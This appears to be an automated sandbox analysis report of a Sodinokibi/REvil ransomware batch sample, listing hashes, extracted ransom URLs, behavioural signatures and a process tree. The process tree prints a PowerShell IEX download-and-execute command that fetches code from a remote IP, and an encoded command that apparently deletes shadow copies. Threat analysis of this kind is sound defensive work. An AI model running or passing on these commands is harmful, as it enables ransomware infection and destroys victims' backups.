Analysis
-
max time kernel
138s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
23-06-2020 03:10
Static task
static1
Behavioral task
behavioral1
Sample
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Resource
win10
General
-
Target
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
-
Size
216B
-
MD5
be80d5e6a14a15ec34832dbba9abf139
-
SHA1
3f56abfb2adcb556bdabeac9b92de7520a81ccbf
-
SHA256
c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b
-
SHA512
20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d
Malware Config
Extracted
http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9
Extracted
C:\w97n39vc9-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF2449B399E6D2ED
http://decryptor.cc/DF2449B399E6D2ED
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1480 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1376 powershell.exe 1376 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3u848n41.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1480 wrote to memory of 1376 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1376 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1376 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1376 1480 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1480 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ResumeEdit.vsx powershell.exe File opened for modification \??\c:\program files\SwitchUpdate.midi powershell.exe File created \??\c:\program files\w97n39vc9-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupCompare.eprtx powershell.exe File opened for modification \??\c:\program files\ConvertFromAdd.vsx powershell.exe File opened for modification \??\c:\program files\SearchBlock.vb powershell.exe File opened for modification \??\c:\program files\TraceSet.m4a powershell.exe File opened for modification \??\c:\program files\UnregisterComplete.xht powershell.exe File created \??\c:\program files (x86)\w97n39vc9-readme.txt powershell.exe File opened for modification \??\c:\program files\GetMove.ttf powershell.exe File opened for modification \??\c:\program files\ResumeSync.mp4v powershell.exe File opened for modification \??\c:\program files\InitializeCompare.mpeg2 powershell.exe File opened for modification \??\c:\program files\InitializeRestart.dib powershell.exe File opened for modification \??\c:\program files\InitializeShow.au powershell.exe File opened for modification \??\c:\program files\LimitCopy.xlsb powershell.exe File opened for modification \??\c:\program files\MoveRedo.asp powershell.exe File opened for modification \??\c:\program files\DismountDebug.xltx powershell.exe File opened for modification \??\c:\program files\EnterRevoke.avi powershell.exe File opened for modification \??\c:\program files\ExportSkip.dotm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w97n39vc9-readme.txt powershell.exe File opened for modification \??\c:\program files\OptimizeEdit.svg powershell.exe File opened for modification \??\c:\program files\WatchResize.vstx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\w97n39vc9-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\w97n39vc9-readme.txt powershell.exe File opened for modification \??\c:\program files\NewImport.inf powershell.exe File opened for modification \??\c:\program files\UnlockInstall.ods powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeBackupPrivilege 1608 vssvc.exe Token: SeRestorePrivilege 1608 vssvc.exe Token: SeAuditPrivilege 1608 vssvc.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1608